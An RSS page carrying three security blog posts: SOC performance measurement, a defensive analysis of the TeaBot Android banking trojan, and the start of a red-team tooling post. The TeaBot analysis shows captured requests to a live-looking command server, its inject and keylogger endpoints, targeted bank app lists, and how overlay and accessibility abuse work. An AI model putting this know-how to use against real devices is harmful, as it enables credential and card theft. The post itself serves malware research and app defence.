RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Going beyond traditional metrics: 3 key strategies to measuring your SOC performance

26 May 2021 at 11:59

Establishing a Security Operation Center is a great way to reduce the risk of cyber attacks damaging your organization by detecting and investigating suspicious events derived from infrastructure and network data.  In traditionally heavily regulated industries such as banking, the motivation to establish a SOC is often further complimented by a regulatory requirement. It is therefore no wonder that SOCs have been and still are on the rise. As for In-House SOCs, “only 30 percent of organizations had this capability in 2017 and 2018, that number jumps to over half (51%)” (DomainTools).

But as usual, increased security and risk reduction comes at a cost, and a SOC’s price tag can be significant. Adding up to the cost of SIEM tools are in-demand cyber security professionals whose salaries reflect their scarcity on the job market, the cost of setting up and maintaining the systems, developing processes and procedures as well as regular trainings and awareness measures.

It is only fair to expect the return on investment to reflect the large sum of money spent – that is for the SOC to run effectively and efficiently in order to secure further funding. But what does that mean?

I would like to briefly discuss a few key points when it comes to properly evaluate a SOC’s performance and capabilities. I will refrain from proposing a one size fits all-approach, but rather outline which common issues I have encountered and which approach I prefer to avoid them.

I will take into account that – like many security functions – a well-operating SOC can be perceived as a bit of a black box, as it will prevent large-scale security incidents from occurring, making it seem like the company is not at risk and is spending too much on security. Cost and budget are always important factors when it comes to risk management, the right balance between providing clear and understandable numbers and sticking to performance indicators that actually signify performance has to be found.

The limitations of security by numbers and metrics-based KPIs

To demonstrate performance, metrics and key performance indicators (KPI) are often employed. A metric is an atomic data point (e.g. the number of tickets an analyst closed in a day) while a KPI sets an expected or acceptable range for the KPI to fall into (e.g. each analyst is supposed to close from x – x+y tickets in a day).

The below table from the SANS institute’s 2019 SOC survey conveys that the top 3 metrics used to track and report a SOC’s performance are the number of incidents/cases handled, the time from detection to containment to eradication (i.e. the time from detection to full closure) and the number of incidents/cases closed per shift.

Figure 1- SANS, Common and Best Practices for Security Operations Centers: Results of the 2019 SOC Survey

Metrics are popular because they quantify complex matters into one or several simple numbers. As the report states, “It’s easy to count; it’s easy to extract this data in an automated fashion; and it’s an easy way to proclaim, ‘We’re doing something!’ Or, ‚We did more this week than last week!‘“ (SANS Institute). But busy does not equal secure.

There are 3 main issues that can arise when using metrics and KPIs to measure a SOC’s performance:

  • Picking out metrics commonly associated with a high workload or -speed does not ensure that the SOC is actually performing well. This is most apparent with the second-most used metric of the time it takes to fully resolve an incident as this will vary greatly depending on the complexity of the cases. Complex incidents may take months to actually resolve (including a full scoping, containment, communication and lessons learned). Teams should not be punished for being diligent where they should be.
    As a metric, e.g. the number of cases handled or closed are atomic pieces of information without much context and meaning to it. This data point could be made into a KPI by defining a range the metric would need to fall into to be deemed acceptable. This works well if the expected value range can be foreseen and quantified, as in ‘You answered 8 out of 10 questions correctly’. For a SOC there is no fixed number of cases supposed to reliably come up each shift.
  • Furthermore, the number of alerts processed and tickets closed can easily be influenced via the detection rules configuration. While generally the “most prominent challenge for any monitoring system—particularly IDSes—is to achieve a high true positive rate” (MITRE), a KPI based on alert volume creates an incentive to work in an opposite direction. As shown below in Figure 2, more advanced detection capabilities will likely reduce the amount of alerts generated by the SIEM, allowing analysts to spend more time to drill down on remaining key alerts and on complementary threat hunting.
Figure 2 – Mitre, Ten Strategies of a World-Class Cybersecurity Operations Center
  • Lessons learned and the respective improvement of the SOC’s capabilities are rarely rewarded with such metrics, resulting in less incentive to perform these essential activities regularly and diligently.

Especially when KPIs are used to evaluate individual people’s performance and eventually affect bonus or promotion decisions, great care must be taken to not create a conflict of interest between reaching an arbitrary target and actually improving the quality of the SOC. Bad KPIs can result in inefficiencies being rewarded and even increase risk.

Metrics and KPIs certainly have their use, but they must be chosen wisely in order to actually indicate risk reduction via the SOC as well as to avoid conflicting incentives.

Below I will highlight strategies on how to rethink KPIs and SOC performance evaluation.

Operating model-based targets

To understand how to evaluate if the SOC is doing well, it is crucial to focus on the SOCs purpose. To do so, the SOC target operating model is the golden source. A target operating model should be mandatory for each and every SOC, especially at the early stages. It details how the SOC integrates into the organization, why it was established and what it will and will not do. Clearly outlining the purpose of the SOC in the operating model, as well as establishing how the SOC plans to achieve this goal, can help to set realistic and strategically sound measures of performance and success. If you don’t know what goal the SOC is supposed to achieve, how can you measure if it got there?

One benefit of this approach is that it allows for a more holistic view on what constitutes ‘the SOC’, taking into account the maturity of the SOC as well as the people, processes and technology trinity that makes up the SOC.

A target operating model-based approach will work from the moment a SOC is being established. Which data sources are planned to be onboarded (and why)? How will detection capabilities be linked to risk, e.g. via a mapping to MITRE? Do you want to automate your response activities? These are key milestones that provide value to the SOC and reaching them can be used as indicators of performance especially in the first few years of establishing and running the SOC.

Formulating Objectives and Key Results (OKR)

From the target operating model, you can start deriving objectives and key results (OKRs) for the SOC. The idea of OKRs is to define an objective (what should be accomplished) and associate key results with it that have to be achieved to get there. KPIs can fit into this model by serving as key results, but linking them with an objective makes sure that they are meaningful and help to achieve a strategic goal (Panchadsaram).

The objectives chosen can be either project or operations-oriented. A project-oriented objective can refer to a new capability that is to be added to the SOC, e.g. the integration of SOAR capabilities for automation. The key results for this objective are then a set of milestones to complete, e.g. selecting a tool, creating an automation framework and completing a POC.

KPIs are generally well suited when it comes to daily operations. Envisioning the SOC as a service within the organization can help to define performance-oriented baselines to monitor the SOC’s health as well as to steer operational improvements.

  • While the number of cases handled is not a good measure of efficiency on its own, it would be odd if a SOC had not even a single case in a month or two, allowing this metric to act as one component to an overall health and plausibility check. If you usually get 15-25 cases each day and suddenly there is radio silence, you may want to check your systems.
  • The total number of cases handled and the number of cases closed per shift can serve to steer operational efficiency by indicating how many analysts the SOC should employ based on the current case volume.

To implement operational KPIs, metrics can be documented over a period of time to be analyzed at the end of a review cycle – e.g. once per quarter – to decide where the SOC has potential for improvement. This way, realistic targets can be defined tailored to the specific SOC.

Testing the SOC’s capabilities

While metrics and milestones can serve as a conceptional indicator of the SOC’s ability to effectively identify and act on security incidents, it is simply impossible to be sure without seeing the SOC’s capabilities applied in an actual incident. You would need to wait for an actual incident to strike, which is not something you can plan, foresee, or even want to happen. In reality, some SOCs may never face a large incident. This means that they got very lucky  – or that they missed something critical. Which of these is true, they will never know. It is very possible to be compromised without knowing.

Purple teaming is a great exercise to see how the SOC is really doing. Purple teaming refers to an activity where the SOC (the ‘blue team’) and penetration testers (the ‘red team’) work together in order to simulate a realistic attack scenario. The actual execution can vary from a complete surprise test where the red teamers act without instructions – just like a real attacker would – , to more defined approaches where specific attack steps are performed in order to confirm if and when they are being detected.

When you simulate an attack in this way, you know exactly what the SOC should have detected and what it actually found. If there is a gap, the exercise provides good visibility on where to follow up in improving the SOC’s capabilities. Areas of improvement can range from a missing data source in the SIEM to a lack of training and experience for analysts. There is rarely a better opportunity to cover people, processes and technology in one single practical assessment.

It is important that these tests are not being seen as a threat to the SOC, especially if it turns out that the SOC does not detect the red team’s activities. Red teaming may therefore be understood as “a practical response to a complex cultural problem” (DCDC), where an often valuable team-oriented culture revolving around cohesion under stress can “constrain[] thinking, discourage[] people from speaking out or exclude[] alternative perspectives” (DCDC). The whole purpose of the exercise is to identify such blind spots, which – especially when conducted for the first times – can be larger than expected. This may discourage some SOC managers from conducting these tests, fearing that they will make them look bad in front of senior management.

Management should therefore encourage such exercises from an early stage and clearly express what they expect as an outcome: That gaps are closed after a proper assessment, not that no gaps will ever show up. If “done well by the right people using appropriate techniques, red teaming can generate constructive critique of a project, inject broader thinking to a problem and provide alternative perspectives to shape plans” (DCDC).

Conducting such testing early on and on a regular basis – at least once a year – can help improve the SOCs performance as well as steering investments the right way, eventually saving money for the organization. Budget can be used effectively to close gaps and to set priorities instead of blindly adding capabilities such as tools or data sources that end up underused and eventually discarded.

Summary

Establishing and running a SOC is a complex and expensive endeavor that should yield more benefit to a company then a couple of checks on compliance checklists. Unfortunately classic SOC metrics are often insufficient to indicate actual risk reduction. Furthermore, metrics can set incentives to work inefficiently and thus waste money and provide a wrong sense of security.

A strategy focused approach on measuring whether the SOC is reaching targets as an organizational unit facilitated by a target operating model complemented by well-defined OKRs and operational KPIs can be of great benefit to lead the SOC to reduce risk more efficiently.

To really know if the SOC is capable of identifying and responding to incidents, regular tests should be conducted in a purple team manner, starting early on and making them a habit as the SOC improves its maturity.

Sarah Wisbar
Sarah Wisbar

Sarah Wisbar is a GCDA and GCFA-certified IT security expert. With several years of experience as a team lead and senior consultant in the financial services sector under her wings, she now manages the NVISO SOC. She likes implementing lean but efficient processes in operations and keeps her eyes on the ever-changing threat landscape to strengthen the SOC’s defenses.

Sources

Domaintools : https://www.domaintools.com/content/survey_security_report_card_2019.pdf

SANS Institute: https://www.sans.org/media/analyst-program/common-practices-security-operations-centers-results-2019-soc-survey-39060.pdf

MITRE : https://www.mitre.org/sites/default/files/publications/pr-13-1028-mitre-10-strategies-cyber-ops-center.pdf

DCDC: https://www.act.nato.int/images/stories/events/2011/cde/rr_ukdcdc.pdf

Panchadsaram: https://www.whatmatters.com/resources/difference-between-okr-kpi/

New mobile malware family now also targets Belgian financial apps

11 May 2021 at 15:14

While banking trojans have been around for a very long time now, we have never seen a mobile malware family attack the applications of Belgian financial institutions. Until today…

Earlier this week, the Italy-based Cleafy published an article about a new android malware family which they dubbed TeaBot. The sample we will take a look at doesn’t use a lot of obfuscation and only has a limited set of features. What is interesting though, is that TeaBot actually does attack the mobile applications of Belgian financial institutions.

This is quite surprising since Banking trojans typically use a phishing attack to acquire the credentials of unsuspecting victims. Those credentials would be fairly useless against Belgian financial applications as they all have secure device enrollment and authentication flows which are resilient against a phishing attack.

So let’s take a closer look at how these banking trojans work, how they are actually trying to attack Belgian banking apps and what can be done to protect these apps.

TL;DR

  • Typical banking malware uses a combination of Android accessibility services and overlay windows to construct an elaborate phishing attack
  • Belgian apps are being targeted with basic phishing attacks and keyloggers which should not result in an account takeover

Android Overlay Attacks

There have been numerous articles written on Android Overlay attacks, including a very recent one from F-Secure labs: “How are we doing with Android’s overlay attacks in 2020?” For those who have never heard of it before, let’s start with a small overview.

Drawing on top of other apps through overlays (SYSTEM_ALERT_WINDOW)

The Android OS allows apps to draw on top of other apps after they have obtained the SYSTEM_ALERT_WINDOW permission. There are valid use cases for this, with Facebook Messenger’s chat heads being the typical example. These chat bubbles stay on top of any other application to allow the user to quickly access their conversations without having to go to the Messenger app.

Overlays have two interesting properties: whether or not they are transparent, and whether or not they are interactive. If an overlay is transparent you will be able to see whatever is underneath the overlay (either another app or the home screen), and if an overlay is interactive it will register any screen touches, while the app underneath will not. Below you can see two examples of this. On the left, there’s Facebook’s Messenger app, which has may interactive views, but also some transparent parts at the top, while on the right you see Twilight, which is a blue light filter that covers the entire screen in a semi-transparent way without any interactive elements in the overlay. The controls that you do see with Twilight is the actual Twilight app that’s opened underneath the red overlay.

Until very recently, if the app was installed through the Google Play store (instead of through sideloading or third party app stores), the application automatically received this permission, without even a confirmation dialog for the user! After much abuse by Banking malware that was installed through the Play store, Google has now added an additional manual verification step in the approval process for apps on the Google Play store. If the app wants to have the permission without requesting it from the user, the app will need to request special permission from Google. But of course, an app can still manually request this permission from the user, and Android’s information for this permission looks rather innocent: “This may interfere with your use of other apps”.

The permission is fairly benign in the hands of the Facebook Messenger app or Twilight, but for mobile malware, the ability to draw on top of other apps is extremely interesting. There are a few ways in which you can use this to attack the user:

  1. Create a fake UI on top of a real app that tricks the user into touching specific locations on the screen. Those locations will not be interactive, and will thus propagate the touch to the underlying application. As a result, the user performs actions in the underlying app without realizing it. This is often called Tapjacking.
  2. Create interactive fields on top of key fields of the app in order to harvest information such as usernames and passwords. This would require the overlay to track what is being shown in the app, so that it can correctly align its own buttons text fields. All in all quite some work and not often used to attack the user.
  3. Instead of only overlaying specific buttons, the overlay covers the entire app and pretends to be the app. A fully functional app (usually a webview) is shown on top of the targeted app and asks the user for their credentials. This is a full overlay attack.

These are just three possibilities, but there are many more. Researchers from Georgia Tech and the UC Santa Barbara have documented different attacks in their paper which also introduces the Cloak and Dagger attacks explained below.

Before we get into Cloak and Dagger, let’s take a look at a few other dangerous Android permissions first.

Accessibility services

Applications on Android can request the accessibility services permission, which allows them to simulate button presses or interact with UI elements outside of their own application. These apps are very useful to people with disabilities who need a bit of extra help to navigate their smartphone. For example, the Google TalkBack application will read out any UI element that is touched on the screen, and requires a double click to actually register as a button press. An alternative application is the Voice Access app which tags every UI element with a number and allows you to select them by using voice commands.

Left: Giving permission to the TalkBack service. Android clearly indicates the dangers of giving this permission
Middle: TalkBack uses text-to-speech to read the description that the user taps
Right: Voice Access adds a button to each UI control and allows you to click them through voice commands

Both of these applications can read UI elements and perform touches on the user’s behalf. Just like overlay windows, this can be a very nice feature, or very dangerous if abused. Malware could use accessibility services to create a keylogger which collects the input of a text field any time data is entered, or it could press buttons on your behalf to purchase premium features or subscriptions, or even just click advertisements.

So let’s take a quick look at what kind of information becomes available by installing the Screen Logger app. The Screen Logger app is a legitimate application that uses accessibility features to monitor your actions. At the time of writing, the application doesn’t even request INTERNET permission, so it shouldn’t be stealing your data in any way. However, it’s always best to do these tests on a device without sensitive data which you can factory-reset. The application is very basic:

  • Install the accessibility service
  • Click the record button
  • Perform some actions and enter some text
  • Click the stop recording button

The app will then show all the information it has collected. Below are some examples of the information it collected from a test app:

The Screen logger application shows the data that was collected through an accessibility service

When enabling accessibility services, users are actually warned about the dangers of enabling accessibility. This makes it a bit harder to trick the user into granting this permission. More difficult, but definitely not impossible. Applications actually have a lot of control over the information that is shown to the user. Take for example the four screens below, which belong to a malware sample. All of the text indicated with red is under control of the attacker. The first screen shows a popup window asking the user to enable the Google service (which is, of course, the name of the malware’s service), and the next three screens are what the user sees while enabling the accessibility permission.

Tricking users into installing an accessibility service

Even if malware can’t convince the user to give the accessibility permission, there’s still a way to trick them using overlay windows. This approach is exactly what Cloak and Dagger does.

Cloak and Dagger

Cloak and Dagger is best explained through their own video, where they show a combination of overlay attacks and accessibility to install an application that has all permissions enabled. In the video shown below, anything that is red is non-transparent and interactive, while everything that is green or transparent is non-interactive and will let touches go through to the app underneath.

Now, over the past few years, Android has made efforts to hinder these kinds of attacks. For example, on newer versions of Android, it’s not possible to configure accessibility settings in case an overlay is active, or Android automatically disables any overlays when going into the Accessibility settings page. Unfortunately this only prevents a malware sample from giving itself accessibility permissions through overlays; it still allows malware to use social engineering tactics to trick users into installing them.

Read SMS permission

Finally, another interesting permission for malware is the RECEIVE_SMS permission, which allows an application to read received SMS messages. While this can definitely be used to invade the user’s privacy, the main reason for malware to acquire this permission is to intercept 2FA tokens which are unfortunately often still sent through SMS. Next to SIM-swapping attacks and attacks against the SS7 infrastructure, this is another way in which those tokens can be stolen.

This permission is pretty self-explanatory and a typical user will probably not grant the permission to a game that they just installed. However, by using phishing, overlays or accessibility attacks, malware can make sure the user accepts the permission.

Does this mean your device is fully compromised? Yes, and no.

Given the very intrusive nature of the attacks described above, it’s not a stretch to say that your device is fully compromised. If malware can access what you see, monitor what you do and perform actions on your behalf, they’re basically using your device just like you would. However, the malware is still (ab)using legitimate functionality provided by the OS, and that does come with restrictions.

For example, even applications with full accessibility permissions aren’t able to access data that is stored inside the application container of another app. This means that private information stored within an app is safe, unless you of course access the data through the app and the accessibility service actively collects everything on the screen.

By combining accessibility and overlay windows, it is actually much easier to social engineer the victim and get their credentials or card information. And this is exactly what Banking Trojans often do. Instead of attacking an application and trying to steal their authentication tokens or modify their behavior, they simply ask the user for all the information that’s required to either authenticate to a financial website or enroll a new device with the user’s credentials.

How to protect your app

Protecting against overlays

Protecting your application against a full overlay is, well, impossible. Some research has already been performed on this and one of the suggestions is to add a visual indicator on the device itself that can inform the user about an overlay attack tacking place. Another study took a look at detecting suspicious patterns during app-review to identify overlay malware. While the research is definitely interesting, it doesn’t really help you when developing an application.

And even if you could detect an overlay on top of your application. What could your application do? There are a few options, but none of them really work:

  • Close the application > Doesn’t matter, the attack just continues, since there’s a full overlay
  • Show something to the user to warn them > Difficult, since you’re not the top-level view
  • Inform the backend and block the account > Possible, though many false negatives. Imagine customer accounts being blocked because they have Facebook messenger installed…

What remains is trying to detect an attack and informing your backend. Instead of directly blocking an account, the information could be taken into account when performing risk analysis on a new sign-up or transaction. There are a few ways to collect this information, but all of them can have many false positives:

  • You can detect if a screen has been obfuscated by listening for onFilterTouchEventForSecurity events. There are however various edge cases where it doesn’t work as expected and will lead to many false negatives and false positives.
  • You can scan for installed applications and check if a suspicious application is installed. This would require you to actively track mobile malware campaigns and update your blacklist accordingly. Given the fact that malware samples often have random package names, this will be very difficult. Additionally, starting with Android 11 (Q), it actually becomes impossible to scan for applications which you don’t define in your Android Manifest.
  • You can use accessibility services yourself to monitor which views are created by the Android OS and trigger an error if specific scenarios occur. While this could technically work, it would give people the idea that financial applications do actually require accessibility services, which would play into the hands of malware developers.

The only real feasible implementation is detection through the onFilterTouchEventForSecurity handler, and, given the many false positives, it can only be used in conjunction with other information during a risk assessment.

Protecting against accessibility attacks

Unfortunately it’s not much better than the section. There are many different settings you can set on views, components and text fields, but all of them are designed to help you improve the accessibility of your application. Removing all accessibility data from your application could help a bit, but this will of course also stop legitimate accessibility software from analyzing your application.

But let’s for a moment assume that we don’t care about legitimate accessibility. How can we make the app as secure as possible to prevent malware from logging our activities? Let’s see…

  • We could set the android:importantForAccessibility attribute of a view component to ‘no’ or ‘noHideDescendants’. This won’t work however, since the accessibility service can just ignore this property and still read everything inside the view component.
  • We could set all the android:contentDescription attributes to “@null”. This will effectively remove all the meta information from the application and will make it much more difficult to track a user. However, any text that’s on screen can still be captured, so the label of a button will still give information about its purpose, even if there is no content description. For input text, the content of the text field will still be available to the malware.
  • We could change every input text to a password field. Password fields are masked and their content isn’t accessible in clear-text format. Depending on the user’s settings, this won’t work either (see next section).
  • Enable FLAG_SECURE on the view. This will prevent screenshots of the view, but it doesn’t impact accessibility services.

About passwords

By default, Android shows the last entered character in a password field. This is useful for the user as they are able to see if they mistyped something. However, whenever this preview is shown, the value is also accessible to the accessibility services. As a result, we can still steal passwords, as shown in the second and third image below:

Left: A password being entered in ProxyDroid
Middle / Right: The entered password can be reconstructed based on the character previews

It is possible for users to disable this feature by going to Settings > Privacy > Show Passwords, but this setting cannot be manipulated from inside an application.

Detecting accessibility services

If we can’t protect our own application, can we maybe detect an attack? Here is where there’s finally some good news. It is possible to retrieve all the accessibility services running on the device, including their capabilities. This can be done through the AccessibilityManager.getEnabledAccessibilityServiceList.

This information could be used to identify suspicious services running on the device. This would require building an dataset of known-good services to compare against. Given that Google is really hammering down on applications requiring accessibility services in the Google Play store, this could be a valid approach.

The obvious downside is that there will still be false positives. Additionally, there may be some privacy related issues as well, since it might not be desirable to identify disabilities in users.

Can’t Google fix this?

For a large part, dealing with these overlay attacks is Google’s responsibility, and over the last few versions, they have made multiple changes to make it more difficult to use the SYSTEM_ALERT_WINDOW (SAW) overlay permission:

  • Android Q (Go Edition) doesn’t support the SAW.
  • Sideloaded apps on Android P loose the SAW permission upon reboot.
  • Android O has marked the SAW permission deprecated, though Android 11 has removed the deprecated status.
  • Play Store apps on Android Q loose the permission on reboot.
  • Android O shows a notification for apps that are performing overlays, but also allows you to disable the notifications through settings (and thus through accessibility as well).
  • Android Q introduced the Bubbles API, which deals with some of the use cases for SAW, but not all of them.

Almost all of these updates are mitigations and don’t fix the actual problem. Only the removal of SAW in Android Q (Go Edition) is a real way to stop overlay attacks, and it may hopefully one day make it into the standard Android version as well.

Android 12 Preview

The latest version of the Android 12 preview actually contains a new permission called ‘HIDE_OVERLAY_WINDOWS‘. After acquiring this permission, an app can call ‘setHideOverlayWindows()’ to disable overlays. This is another step in the right direction, but it’s still far from great. Instead of targeting the application when the user opens it, the malware could still create fake notifications that link directly to the overlay without the targeted application even being opened.

It’s clear that it’s not an easy problem to fix. Developers were given the option to use SAW since Android 1, and many apps rely on the permission to provide their core functionality. Removing it would affect many apps, and would thus get a lot of backlash. Finally, any new update that Google makes will take many years to reach a high percentage of Android users, due to Android’s slow update process and unwillingness for mobile device manufacturers to provide major OS updates to users.

Now that we understand the permissions involved, let’s go back to the TeaBot malware.

TeaBot – Attacking Belgian apps

What was surprising about Cleafy’s original report is the targeting of Belgian applications which so far had been spared of similar attacks. This is also a bit surprising since Belgian financial apps all make use of strong authentication (card readers, ItsMe, etc) and are thus pretty hard to successfully phish. Let’s take a look at how exactly the TeaBot family attacks these applications.

Once the TeaBot malware is installed, it shows a small animation to the user how to enable accessibility options. It doesn’t provide a specific explanation for the accessibility service, and it doesn’t pretend to be a Google or System service. However, if you wait too long to activate the accessibility service, the device will regularly start vibrating, which is extremely annoying and will surely convince many victims to enable the services.

  • Main view when opening the app
  • Automatically opens the Accessibility Settings
  • No description of the service
  • The service requests full control
  • If you wait too long, you get annoying popups and vibration
  • After enabling the service, the application quits and shows an error message

This specific sample pretends to be bpost, but TeaBot also pretends to be the VLC Media Player, the Spanish postal app Correos, a video streaming app called Mobdro, and UPS as well.

The malware sample has the following functionality related to attacking financial applications:

  • Take a screenshot;
  • Perform overlay attacks on specific apps;
  • Enable keyloggers for specific apps.

Just like the FluBot sample from our last blogpost, the application collects all of the installed applications and then sends them to the C2 which returns a list of the applications that should be attacked:

POST /api/getbotinjects HTTP/1.1
Accept-Charset: UTF-8
Content-Type: application/xml
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 776

{"installed_apps":[{"package":"org.proxydroid"},{"package":"com.android.documentsui"}, ...<snip>... ,{"package":"com.android.messaging"}]}
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2
Date: Mon, 10 May 2021 19:20:51 GMT

[]

In order to identify the applications that are attacked, we can supply a list of banking applications which will return more interesting data:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2031830
Date: Mon, 10 May 2021 18:28:01 GMT

[
	{
		"application":"com.kutxabank.android",
		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>",
		"inj_type":"bank"
	},
	{
		"application":"com.bbva.bbvacontigo",
		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>"
	}
]

By brute-forcing against different C2 servers, overlays for the following apps were returned:

app.wizink.es
be.belfius.directmobile.android
com.abanca.bancaempresas
com.abnamro.nl.mobile.payments
com.bancomer.mbanking
com.bankia.wallet
com.bankinter.launcher
com.bbva.bbvacontigo
com.bbva.netcash
com.cajasur.android
com.db.pwcc.dbmobile
com.facebook.katana
com.google.android.gm
com.grupocajamar.wefferent
com.ing.mobile
com.kutxabank.android
com.latuabancaperandroid
com.rsi
com.starfinanz.smob.android.sfinanzstatus
com.tecnocom.cajalaboral
com.unicredit
de.comdirect.android
de.commerzbanking.mobil
es.bancosantander.apps
es.cm.android
es.ibercaja.ibercajaapp
es.lacaixa.mobile.android.newwapicon
es.liberbank.cajasturapp
es.openbank.mobile
es.univia.unicajamovil
keyloggers.json
www.ingdirect.nativeframe

Only one Belgian financial application (be.belfius.directmobile.android) returned an overlay. The interesting part is that the overlay only phishes for credit card information and not for anything related to account onboarding:

The overlay requests the debit card number, but nothing else.

This overlay will be shown when TeaBot detects that the Belfius app has been opened. This way the user will expect a Belfius prompt to appear, which gives more credibility to the malicious view that was opened.

The original report by Cleafy specified at least 5 applications under attack, so we need to dig a bit deeper. Another endpoint called by the samples is /getkeyloggers. Fortunately, this one does simply return a list of targeted applications without us having to guess.

GET /api/getkeyloggers HTTP/1.1
Accept-Charset: UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Host: 185.215.113.31
Connection: close
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 1205
Date: Tue, 11 May 2021 12:45:30 GMT

[{"application":"com.ing.banking"},{"application":"com.binance.dev"},{"application":"com.bankinter.launcher"},{"application":"com.unicredit"},{"application":"com.lynxspa.bancopopolare"}, ... ]

Scattered over multiple C2 servers, we could identify the following targeted applications:

app.wizink.es
be.argenta.bankieren
be.axa.mobilebanking
be.belfius.directmobile.android
be.bmid.itsme
be.keytradebank.phone
bvm.bvmapp
com.abnamro.nl.mobile.payments
com.bancomer.mbanking
com.bankaustria.android.olb
com.bankia.wallet
com.bankinter.launcher
com.bbva.bbvacontigo
com.bbva.netcash
com.beobank_prod.bad
com.binance.dev
com.bnpp.easybanking
com.bnpp.easybanking.fintro
com.bpb.mobilebanking.smartphone.prd
com.cajasur.android
com.coinbase.android
com.db.pbc.miabanca
com.db.pbc.mibanco
com.db.pbc.mybankbelgium
com.db.pwcc.dbmobile
com.grupocajamar.wefferent
com.ing.banking
com.ing.mobile
com.kbc.mobile.android.phone.kbc
com.kbc.mobile.android.phone.kbcbrussels
com.kutxabank.android
com.latuabancaperandroid
com.lynxspa.bancopopolare
com.mobileloft.alpha.droid
com.starfinanz.smob.android.bwmobilbanking
com.starfinanz.smob.android.sfinanzstatus
com.triodos.bankingnl
com.unicredit
de.comdirect.android
de.commerzbanking.mobil
de.dkb.portalapp
de.fiducia.smartphone.android.banking.vr
de.ingdiba.bankingapp
de.postbank.finanzassistent
de.santander.presentation
de.sdvrz.ihb.mobile.secureapp.sparda.produktion
de.traktorpool
es.bancosantander.apps
es.cm.android
es.evobanco.bancamovil
es.ibercaja.ibercajaapp
es.lacaixa.mobile.android.newwapicon
es.liberbank.cajasturapp
es.openbank.mobile
es.univia.unicajamovil
eu.unicreditgroup.hvbapptan
it.bnl.apps.banking
it.gruppobper.ams.android.bper
it.nogood.container
it.popso.SCRIGNOapp
net.inverline.bancosabadell.officelocator.android
nl.asnbank.asnbankieren
nl.rabomobiel
nl.regiobank.regiobankieren
piuk.blockchain.android
posteitaliane.posteapp.appbpol
vivid.money
www.ingdirect.nativeframe

Based on this list, 14 Belgian applications are being attacked through the keylogger module. Since all these applications have a strong device onboarding and authentication flow, the impact of the collected information should be limited.

However, if the applications don’t detect the active keylogger, the malware could still collect any information entered by the user into the app. In this regard, the impact is the same as when someone installs a malicious keyboard that logs all the entered information.

Google Play Protect will protect you

The TeaBot sample is currently not known to spread in the Google Play store. That means victims will need to install it by downloading and installing the app manually. Most devices will have Google Play protect installed, which will automatically block the currently identified TeaBot samples.

Of course, this is a typical cat & mouse game between Google and malware developers, and who knows how many samples may go undetected …

Conclusion

It’s very interesting to see how TeaBot attacks the Belgian financial applications. While they don’t attempt to social engineer a user into a full device onboarding, the malware developers are finally identifying Belgium as an interesting target.

It will be very interesting to see how these attacks will evolve. Eventually all financial applications will have very strong authentication and then malware developers will either have to be satisfied with only stealing credit-card information, or they will have to invest into more advanced tactics with live challenge/responses and active social engineering.

From a development point of view, there’s not much we can do. The Android OS provides the functionality that is abused and it’s difficult to take that functionality away again. Collecting as much information about the device as possible can help in making correct assessments on the risk of certain transactions, but there’s no silver bullet.

Jeroen Beckers
Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map

27 April 2021 at 15:52

This blogpost will be a bit different, as it’s going to tell a bit of a story…

In this blogpost I want to achieve 2 objectives:

  • address a question I keep hearing and seeing pop up in my DM every now and then, “how do I become a red teamer/ how do I become a toolsmith / how do I learn more about internals”,…) and I will do so by telling about an experience that happened to me recently.
  • Introduce the Marauders Map, heavily inspired on the great work of MDSec’s SharpPack.

Without further ado, let’s get into it…

Why you should think before you run.

Quite recently one of our clients has asked us to do an assessment of their environment. We got initial foothold through an assumed breach scenario, giving us full access on a workstation as a normal user.
This organization is pretty well secured, and has been a client of us for a few years now. It’s always nice to see your clients mature as you advise them from a consultant point of view. That being said, we wanted to try something “different” than our other approaches.

Being a bit of a toolsmith myself, I was already working on 2 offensive tools, as it turns out both already existed in the open source world, as pointed out to me by @shitsecure (Fabian Mosch) and @domchell (Dominic Chell). Dominic from MDSec pointed me to a (fairly) old blogpost on their own blog, called SharpPack: The Insider Threat Toolkit and Fabian pointed me to a cool project from @Flangvik called NetLoader.

If you start releasing tools (or if you are a pentester/red teamer using OST (= Open Source Tooling)) you’ll see a few names pop up over and over again. In general, it’s a good idea from both red and blue to keep an eye on their work, as it is often of pretty high quality and nothing less than amazing.

Recently, I have come across some discussion in the infosec community about the OSCP and how a student (initially) failed their exam because they ran linPEAS. This brings me to the following point. If you want to become better at something, you should DO IT. A stupid but accurate example which will prove my point is the following: If you want to learn to drive a car, you will not learn it from watching other people drive a car. At one point, you’ll have to take place behind the wheel and drive for yourself, even if can be a bit scary.

Coding, pentesting and red teaming is no different. Let me ask you this, if you run tools you did not write yourself, and you never look at the source code of said tools, how can you understand what it does, and more importantly, how are you bringing value to your client? How can you give accurate and to the point recommendations, if you don’t even know how the exploit or tool works?

Unfortunately, I see a lot of pentesters and even red teamers make this mistake. And to be perfectly honest, I have made that mistake too. I just hope that this post might convince you to think twice before you “go loco” in your clients infrastructure next time

The Maraudersmap, a copy of Sharppack?

As I was already writing the tooling before I noticed sharppack was already a thing, I had three options:

  1. Trash my project
  2. Continue my project, taking sharppack into account
  3. Submit PR’s to sharppack

I was just on the verge of trashing my project, when my friend Fabian (@shitsecure) DM’d me noticing I had removed a tweet, and he stated something along the lines of, just continue the project and learn from it, and he was right. So two more options remained.

My code base was already out of sync with sharppack, as for example, I was leveraging IONIC.ZIP to execute binaries from encrypted zips, much like my other tool sharpziprunner does. Submitting PR’s would also mean I would have to take into account I should probably test the project extensively to see if my code would end up breaking things.

